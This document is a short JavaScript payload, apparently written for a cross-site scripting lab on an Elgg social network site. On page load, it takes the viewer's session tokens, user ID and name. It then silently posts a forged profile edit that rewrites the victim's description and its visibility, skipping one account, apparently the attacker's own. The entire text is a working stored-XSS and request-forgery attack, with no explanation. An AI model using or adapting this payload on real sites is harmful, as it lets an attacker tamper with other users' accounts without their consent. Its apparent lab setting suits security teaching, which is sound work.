<script type="text/javascript">
	window.onload = function() {
		var elgg_ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
		var elgg_token = "&__elgg_token=" + elgg.security.token.__elgg_token;
		var guid = "&guid=" + elgg.session.user.guid;
		var name = "&name=" + elgg.session.user.name;
		var desc = "&description=:):):):):):). zyx" + "&accesslevel[description]=2";
		var content = elgg_token + elgg_ts + name + desc + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	
		if (elgg.session.user.guid != 47) {
			var Ajax = null;
			Ajax = new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	}
</script>